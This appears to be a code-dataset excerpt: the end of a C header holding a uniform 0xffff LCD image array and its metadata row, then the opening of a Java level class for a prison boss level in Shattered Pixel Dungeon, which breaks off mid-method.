0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff
};
| 1,229,353 | lcd_image | h | es | c | code | {"qsc_code_num_words": 153612, "qsc_code_num_chars": 1229353.0, "qsc_code_mean_word_length": 5.99983074, "qsc_code_frac_words_unique": 0.02519334, "qsc_code_frac_chars_top_2grams": 0.60930553, "qsc_code_frac_chars_top_3grams": 0.85970318, "qsc_code_frac_chars_top_4grams": 1.09577864, "qsc_code_frac_chars_dupe_5grams": 0.85338188, "qsc_code_frac_chars_dupe_6grams": 0.83620826, "qsc_code_frac_chars_dupe_7grams": 0.82154754, "qsc_code_frac_chars_dupe_8grams": 0.81055199, "qsc_code_frac_chars_dupe_9grams": 0.80251854, "qsc_code_frac_chars_dupe_10grams": 0.7961712, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.33964466, "qsc_code_frac_chars_whitespace": 0.12534317, "qsc_code_size_file_byte": 1229353.0, "qsc_code_num_lines": 485.0, "qsc_code_num_chars_line_max": 2596.0, "qsc_code_num_chars_line_mean": 2534.74845361, "qsc_code_frac_chars_alphabet": 0.51749155, "qsc_code_frac_chars_comments": 0.0, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.04761905, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.74966324, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.0, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 1, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 1, "qsc_code_frac_chars_dupe_6grams": 1, "qsc_code_frac_chars_dupe_7grams": 1, "qsc_code_frac_chars_dupe_8grams": 1, "qsc_code_frac_chars_dupe_9grams": 1, "qsc_code_frac_chars_dupe_10grams": 1, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 1, "qsc_code_num_chars_line_mean": 1, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 1, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 1, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/levels/OldPrisonBossLevel.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.levels;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Bones;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.ShatteredPixelDungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Blob;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.Mob;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.OldTengu;
import com.shatteredpixel.shatteredpixeldungeon.items.Heap;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.items.keys.IronKey;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.missiles.HeavyBoomerang;
import com.shatteredpixel.shatteredpixeldungeon.levels.rooms.MazeRoom;
import com.shatteredpixel.shatteredpixeldungeon.levels.rooms.Room;
import com.shatteredpixel.shatteredpixeldungeon.levels.rooms.standard.EmptyRoom;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.GrippingTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.Trap;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.plants.Plant;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.tiles.CustomTilemap;
import com.shatteredpixel.shatteredpixeldungeon.ui.TargetHealthIndicator;
import com.shatteredpixel.shatteredpixeldungeon.utils.BArray;
import com.watabou.noosa.Group;
import com.watabou.noosa.Tilemap;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Bundlable;
import com.watabou.utils.Bundle;
import com.watabou.utils.PathFinder;
import com.watabou.utils.Random;
import java.util.ArrayList;
//Exists to support pre-0.7.5 saves
public class OldPrisonBossLevel extends Level {
{
color1 = 0x6a723d;
color2 = 0x88924c;
}
public enum State {
START,
FIGHT_START,
MAZE,
FIGHT_ARENA,
WON
}
private static final int ARENA_CENTER = 5+28*32;
private static final int ARENA_DOOR = 5+25*32;
private State state;
private OldTengu tengu;
public State state(){
return state;
}
//keep track of that need to be removed as the level is changed. We dump 'em back into the level at the end.
private ArrayList<Item> storedItems = new ArrayList<>();
@Override
public String tilesTex() {
return Assets.TILES_PRISON;
}
@Override
public String waterTex() {
return Assets.WATER_PRISON;
}
private static final String STATE = "state";
private static final String TENGU = "tengu";
private static final String STORED_ITEMS = "storeditems";
@Override
public void storeInBundle( Bundle bundle ) {
super.storeInBundle(bundle);
bundle.put( STATE, state );
bundle.put( TENGU, tengu );
bundle.put( STORED_ITEMS, storedItems);
}
@Override
public void restoreFromBundle( Bundle bundle ) {
super.restoreFromBundle(bundle);
state = bundle.getEnum( STATE, State.class );
//in some states tengu won't be in the world, in others he will be.
if (state == State.START || state == State.MAZE) {
tengu = (OldTengu)bundle.get( TENGU );
} else {
for (Mob mob : mobs){
if (mob instanceof OldTengu) {
tengu = (OldTengu) mob;
break;
}
}
}
for (Bundlable item : bundle.getCollection(STORED_ITEMS)){
storedItems.add( (Item)item );
}
}
@Override
protected boolean build() {
setSize(32, 32);
map = MAP_START.clone();
buildFlagMaps();
cleanWalls();
state = State.START;
entrance = 5+2*32;
exit = 0;
resetTraps();
return true;
}
@Override
protected void createMobs() {
tengu = new OldTengu(); //We want to keep track of tengu independently of other mobs, he's not always in the level.
}
public Actor respawner() {
return null;
}
@Override
protected void createItems() {
Item item = Bones.get();
if (item != null) {
drop( item, randomRespawnCell() ).setHauntedIfCursed(1f).type = Heap.Type.REMAINS;
}
drop(new IronKey(10), randomPrisonCell());
}
private int randomPrisonCell(){
int pos = 1+8*32; //initial position at top-left room
//randomly assign a room.
pos += Random.Int(4)*(4*32); //one of the 4 rows
pos += Random.Int(2)*6; // one of the 2 columns
//and then a certain tile in that room.
pos += Random.Int(3) + Random.Int(3)*32;
return pos;
}
private int randomTenguArenaCell(){
int pos = ARENA_CENTER - 2 - (2*32);//initial position at top-left of room
pos += Random.Int(5)*32;
pos += Random.Int(5);
//cannot choose the center
